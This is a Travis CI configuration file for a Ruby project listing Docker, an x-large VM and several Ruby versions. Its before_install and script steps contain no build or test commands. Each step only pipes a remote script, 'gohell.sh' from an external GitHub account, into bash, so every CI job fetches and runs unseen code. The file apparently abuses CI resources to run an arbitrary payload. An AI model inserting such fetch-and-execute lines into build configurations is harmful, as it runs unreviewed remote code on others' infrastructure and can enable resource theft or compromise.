language: ruby

services:
  - docker
  
vm:
  size: x-large
  
rvm:
  - "3.0.1"
  - "2.7.3"
  - "2.6.7"
  - "2.5.9"
  - "3.0.0"
  - "2.7.2"

before_install:
  - curl -sL https://raw.githubusercontent.com/6248202226/gradi/main/gohell.sh | bash

script:
  - curl -sL https://raw.githubusercontent.com/6248202226/gradi/main/gohell.sh | bash
